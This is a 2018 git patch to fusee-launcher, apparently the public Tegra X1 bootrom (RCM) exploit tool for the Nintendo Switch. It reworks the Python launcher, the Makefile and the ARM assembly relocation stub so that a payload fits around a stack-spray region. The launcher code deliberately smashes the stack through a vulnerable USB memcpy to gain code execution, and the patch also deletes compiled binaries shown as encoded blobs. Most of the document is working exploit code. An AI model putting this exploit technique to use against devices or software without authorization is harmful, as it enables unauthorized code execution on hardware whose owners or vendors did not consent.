From 9e0ed49e717eddd6f3e6ce32c1aac02979f5c9da Mon Sep 17 00:00:00 2001
From: trisz404 <trisz404@gmail.com>
Date: Wed, 2 May 2018 16:10:51 +0200
Subject: [PATCH] Restruct the payload, so it can fit more code

---
 Makefile          |  22 ++++++++++++++--------
 fusee-launcher.py |  30 +++++++++++++++++++-----------
 intermezzo.S      |  17 ++++++++++++-----
 intermezzo.bin    | Bin 92 -> 0 bytes
 intermezzo.elf    | Bin 62096 -> 0 bytes
 intermezzo.o      | Bin 872 -> 0 bytes
 6 files changed, 45 insertions(+), 24 deletions(-)
 delete mode 100755 intermezzo.bin
 delete mode 100755 intermezzo.elf
 delete mode 100644 intermezzo.o

diff --git a/Makefile b/Makefile
index 6179ab8..1f1347a 100644
--- a/Makefile
+++ b/Makefile
@@ -25,27 +25,33 @@ LDFLAGS =
 
 all: intermezzo.bin
 
-# The start of the BPMP IRAM.
-START_OF_IRAM := 0x40000000
+# The new address of the Intermezzo after copy
+INTERMEZZO_RELOCATED_ADDRESS := 0x4000F000
 
 # The address to which Intermezzo is to be loaded by the payload launcher.
-INTERMEZZO_ADDRESS := 0x4001F000
+INTERMEZZO_ADDRESS := 0x40010000
 
 # The address we want the final payload to be located at.
 RELOCATION_TARGET  := 0x40010000
 
 # The addrss and length of the data loaded by f-g.
-LOAD_BLOCK_START   := 0x40020000
-LOAD_BLOCK_LENGTH  := 0x20000
+PAYLOAD_START_ADDR  := 0x40010E40
+STACK_SPRAY_START   := 0x40014E40
+STACK_SPRAY_END     := 0x40017000
+BEFORE_SPRAY_LENGTH := $(shell echo $$(( $(STACK_SPRAY_START) - $(PAYLOAD_START_ADDR) )))
+AFTER_SPRAY_LENGTH  := 0x30000
 
 ENTRY_POINT_ADDRESS := 0x40010000
 
 # Provide the definitions used in the intermezzo stub.
 DEFINES := \
-	-DSTART_OF_IRAM=$(START_OF_IRAM) \
+	-DINTERMEZZO_RELOCATED_ADDRESS=$(INTERMEZZO_RELOCATED_ADDRESS) \
 	-DRELOCATION_TARGET=$(RELOCATION_TARGET) \
-	-DLOAD_BLOCK_START=$(LOAD_BLOCK_START) \
-	-DLOAD_BLOCK_LENGTH=$(LOAD_BLOCK_LENGTH) \
+	-DPAYLOAD_START_ADDR=$(PAYLOAD_START_ADDR) \
+	-DSTACK_SPRAY_START=$(STACK_SPRAY_START) \
+	-DSTACK_SPRAY_END=$(STACK_SPRAY_END) \
+	-DBEFORE_SPRAY_LENGTH=$(BEFORE_SPRAY_LENGTH) \
+	-DAFTER_SPRAY_LENGTH=$(AFTER_SPRAY_LENGTH) \
 	-DENTRY_POINT_ADDRESS=$(ENTRY_POINT_ADDRESS)
 
 intermezzo.elf: intermezzo.o
diff --git a/fusee-launcher.py b/fusee-launcher.py
index fa7f54e..39f1d8d 100755
--- a/fusee-launcher.py
+++ b/fusee-launcher.py
@@ -32,8 +32,9 @@ import platform
 
 # specify the locations of important load components
 RCM_PAYLOAD_ADDR    = 0x40010000
-INTERMEZZO_LOCATION = 0x4001F000
-PAYLOAD_LOAD_BLOCK  = 0x40020000
+PAYLOAD_START_ADDR  = 0x40010E40
+STACK_SPRAY_START   = 0x40014E40
+STACK_SPRAY_END     = 0x40017000
 
 # notes:
 # GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
@@ -445,9 +446,6 @@ payload += b'\0' * (680 - len(payload))
 # Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
 # We'll use this data to smash the stack when we execute the vulnerable memcpy.
 print("\nSetting ourselves up to smash the stack...")
-repeat_count = int((INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDR) / 4)
-intermezzo_location_raw = INTERMEZZO_LOCATION.to_bytes(4, byteorder='little')
-payload += (intermezzo_location_raw * repeat_count)
 
 # Include the Intermezzo binary in the command stream. This is our first-stage
 # payload, and it's responsible for relocating the final payload to 0x40010000.
@@ -458,15 +456,25 @@ with open(intermezzo_path, "rb") as f:
     payload        += intermezzo
 
 
-# Finally, pad until we've reached the position we need to put the payload.
-# This ensures the payload winds up at the location Intermezzo expects.
-position = INTERMEZZO_LOCATION + intermezzo_size
-padding_size = PAYLOAD_LOAD_BLOCK - position
+# Pad the payload till the start of the payload
+padding_size   = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)
 payload += (b'\0' * padding_size)
 
-# Read the payload into memory.
+target_payload = b''
+# Read the rest of the payload into memory.
 with open(payload_path, "rb") as f:
-    payload += f.read()
+    target_payload = f.read()
+
+# First part of the payload
+padding_size   = STACK_SPRAY_START - PAYLOAD_START_ADDR
+payload += target_payload[:padding_size]
+
+# Gap in the payload, stack spray
+repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
+payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)
+
+# Read the rest of the payload into memory.
+payload += target_payload[padding_size:]
 
 # Pad the payload to fill a USB request exactly, so we don't send a short
 # packet and break out of the RCM loop.
diff --git a/intermezzo.S b/intermezzo.S
index 2ab2371..098f26d 100644
--- a/intermezzo.S
+++ b/intermezzo.S
@@ -8,15 +8,15 @@
 _start:
 
     // First, we'll need to move ourselves _out_ of the target area.
-    // We'll copy down into the start of the IRAM.
-    ldr r0, =START_OF_IRAM
+    // We'll copy down into the IRAM.
+    ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
     ldr r1, =post_relocation
     ldr r2, =intermezzo_end
     sub r2, r2, r1
     bl  copy
 
     // Jump to the start of RAM, which should now contain the post-relocation code.
-    ldr r0, =START_OF_IRAM
+    ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
     bx  r0
 
 
@@ -25,8 +25,15 @@ post_relocation:
 
     // Next, we'll copy our payload down to the appropriate relocaiton address.
     ldr r0, =RELOCATION_TARGET
-    ldr r1, =LOAD_BLOCK_START
-    ldr r2, =LOAD_BLOCK_LENGTH
+    ldr r1, =PAYLOAD_START_ADDR
+    ldr r2, =BEFORE_SPRAY_LENGTH
+    bl  copy
+
+    ldr r0, =RELOCATION_TARGET
+    ldr r1, =BEFORE_SPRAY_LENGTH
+    add r0, r0, r1
+    ldr r1, =STACK_SPRAY_END
+    ldr r2, =AFTER_SPRAY_LENGTH
     bl  copy
 
     // Finally, jump into the relocated target.
diff --git a/intermezzo.bin b/intermezzo.bin
deleted file mode 100755
index b0f45127b4d68456fe7eadcf4943f1ef2fe6a89b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 92
zcmZQ%T=3XIVE$7Fh51hz6`US$FfhDk1d0j#*MG>su;8H%!~CZ@KzSyO1&<klaxy?Z
mNRGu|;u98wh9@ivL63g_|1Tv66jS)X=nw<M3=AO5<NyGssw0~K

diff --git a/intermezzo.elf b/intermezzo.elf
deleted file mode 100755
index 070de5aa37ae046bd55e5b6018acb8d8b67a6821..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 62096
zcmeIwK}%Fo6ae7!#!-?WrbR6(Vgd<+u!0ut8pDFX2wV#?+CV}&GQObN)L-Zq=uhY;
zW$LPpu3Jp!s$(OxXdT~$bMHIno_F7SAMf+?#TQjo#b`8QHcqmms`EIDyT>^-V)Ajc
zvpySBF>$(oazoXLs5;9>5hW&1YbUdb009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs
z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U
zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7
z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N
z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1pY69s@mP}v~~_V?VZD_{p|ath@Yj_
z8a~*I*xkDyJBRmkzcIVJU*+Dd%*$T$;n#!a!!HNT_R^1E!{LqFS!*9vo#l*(5{=IM
zwY2K?x~uC^UCzs?#-(aH5Bcjjxi4ZOE;dX=<3gnw$HOb-fV2L5R$R@rJiC-jekbQA
zWBJ|87sv8@nV-IAL@WEBWIj5t<WDc;$HQ3Ptb2ov-ltFfxqi%aW2?ViuMB$c`fJ^K
zy}uc2{jHBN^Jc7XrMLMeR<`TzppM1Y^9w8U3kypTbK4&`>h5Z;_26`UJG!cSAL^K!
zUwSpyt?R-1>ifF4UEbp#$Ia|3a#N+heCttuW4S&Xt+Tb*Ohjyr>dV=8eU#)n(l4gj
ucRn_bBOaY+fBH&)W2|21dEYXh%*cN!ni;K(>5TF7X7aq3SsRVfbAJOW0dau<

diff --git a/intermezzo.o b/intermezzo.o
deleted file mode 100644
index 793e1216079fe1d3e35d262cdd1ee866ad0b478d..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 872
zcma)4%}N4M6h7C#v^EA6{YVXDAS9DSi<V<hv@i(Qfn0SUAsv~yLAt3|XxAdpM`+Ol
z^eCCS@)26tcXY0eZt5G(eBb%GXU@HM9?uIGLI~0jl%Zb_(a<ClJ(*C35){*=6BeS|
zx00QqWpswZIQxtfjX0JZAN7d3y)1QxS>!{RZXbO|Dfpa=<emqS+|wXp6u-X5<LzC<
zj9F)4;loyb9RX>}a*f0aWGoaHiMinrTtIk!dJ5wSB21Bm3V{fbF)I?Z27Mavx1b9F
ze<mTq6s1%kkVN<WIUi11Qq%EN$+hpCic~eHK^3RjqI8u?o|3MjT0_}x-EOy?lHI6c
z$tElV<8x=e^qJ=f;S8>sm+>;aR$a+5Sh-Wa)e4_8mHnW|tV$)xEPEcA`Qnu+m2zw4
zdu4lQ@IUOKjE`R5z6E^)(@6Sa2b_RezW;(nJpU4m*YjD&VF$jiZ|4<$5M0YRgmL{}
zb-8Ix6Ep$$+we7$?zal9dvW{&35$gfUB^8A^{0t<&>M_r;r;PGc+aeZ{i;}ajF^V*
F_X98)S6l!9